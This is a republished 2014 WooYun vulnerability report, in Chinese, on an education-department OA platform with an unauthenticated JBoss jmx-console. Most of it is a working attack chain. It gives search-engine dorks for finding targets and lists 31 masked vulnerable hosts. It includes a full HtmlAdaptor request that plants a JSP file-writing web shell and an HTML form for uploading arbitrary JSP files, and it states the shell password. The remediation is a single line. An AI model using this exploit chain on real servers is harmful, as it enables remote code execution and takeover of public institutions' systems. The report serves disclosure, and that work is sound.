教育部门OA系统未授权访问导致文件上传任意代码执行

admin
admin
admin
102776
文章
87
评论
2015年6月9日03:46:45评论700 views字数 254阅读0分50秒阅读模式
摘要

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-05: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-09-10: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(18) 关注此漏洞

缺陷编号: WooYun-2014-75050

漏洞标题: 教育部门OA系统未授权访问导致文件上传任意代码执行 教育部门OA系统未授权访问导致文件上传任意代码执行

相关厂商: 上海育盟信息技术有限公司

漏洞作者: YY-2012

提交时间: 2014-09-05 00:00

公开时间: 2014-09-10 00:02

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 未授权访问 认证设计不合理

4人收藏

漏洞详情

披露状态:

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-05: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-09-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

教育部门OA系统未授权访问导致文件上传任意代码执行(主动+被动扫描发现31个)

详细说明:

code 区域 
通过谷歌等搜索引擎搜索intitle:教育电子政务平台 或者inurl:edoas2/oa.jsp
 或通过全网地址扫描“/jmx-console/”
code 区域 
**.**.**.**/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**:8000/jmx-console/
 **.**.**.**:8000/jmx-console/
 **.**.**.**:88/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**:8088/jmx-console/
 http://**.**.**.**/jmx-console/
 http://**.**.**.**:8080/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**:81/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 http://**.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/
 **.**.**.**/jmx-console/

以**.**.**.**为案例对象:

code 区域 
**.**.**.**/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+**.**.**.**.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”

再通过以下html可进行文件上传:

code 区域 
<html>
 <head>
 <meta http-equiv="content-type" content="text/html;charset=utf-8">
 <title>jsp-test</title>
 </head>
 <style>
 .main{width:980px;height:600px;margin:0 auto;}
 .url{width:300px;}
 .fn{width:60px;}
 .content{width:80%;height:60%;}
 </style>
 <script>
   function upload(){
     var url = document.getElementById('url').value,
       content = document.getElementById('content').value,
       fileName = document.getElementById('fn').value,
       form = document.getElementById('fm');
     if(url.length == 0){
       alert("Url not allowd empty!");
       return ;
     }
     if(content.length == 0){
       alert("Content not allowd empty!");
       return ;
     }
     if(fileName.length == 0){
       alert("FileName not allowd empty!");
       return ;
     }
     form.action = url;
     form.submit();
   }
 </script>
 <body>
 <div class="main">
   <form id="fm" method="post">  
     URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" />  
     FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
     <a href="javascript:upload();">Upload</a><br/>
     <textarea id="content" class="content" name="t" ></textarea>
   </form>
 </div>
 </body>
 </html>
code 区域 
**.**.**.**/upload5warn/css.jsp
 
 密码为:1

漏洞证明:

教育部门OA系统未授权访问导致文件上传任意代码执行

教育部门OA系统未授权访问导致文件上传任意代码执行

教育部门OA系统未授权访问导致文件上传任意代码执行

修复方案:

jboss设置授权访问

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-10 00:02

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

0%

50%

0%

0%

50%

评价

  1. 2014-09-05 00:38 | ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子, 但是除了他华...)

    1

    转给CCERT教育网应急响应组处理可能会杯具

  2. 2014-09-05 08:30 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    0

    @YY-2012 啥OA??

  3. 2014-09-05 10:47 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

    0

    默默关注

  4. 2014-09-10 00:18 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    我感觉这个和“/bug.php?action=view&id=7077”、“ WooYun: 育软电子政务平台未授权访问(Windows平台安全经典案例) ”是一样的。Jboss漏洞

  5. 2014-09-10 00:18 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    0

    @CCERT教育网应急响应组 @xsser @Finger @疯狗 @浩天 教育网应急响应组忽略的补rank吗

  6. 2014-09-10 00:21 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    0

    @U神 我不是投通用,我早知道一样的我。我投的是集合

  7. 2014-09-10 00:22 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    @YY-2012 rank肯定是会补的,WooYun评价:15Rank

  8. 2014-09-10 08:20 | 贫道来自河北 ( 普通白帽子 | Rank:1469 漏洞数:439 | 一个立志要把乌云集市变成零食店的男人)

    0

    己公开

  9. 2014-09-10 09:14 | 一只猿 ( 普通白帽子 | Rank:560 漏洞数:98 | 硬件与无线通信研究方向)

    0

    http://wooyun.org/bugs/wooyun-2013-033468也集合一下

  10. 2014-09-10 10:29 | YY-2012 ( 核心白帽子 | Rank:3861 漏洞数:736 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    0

    @一只猿 和我的没重复啊。倒逼

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin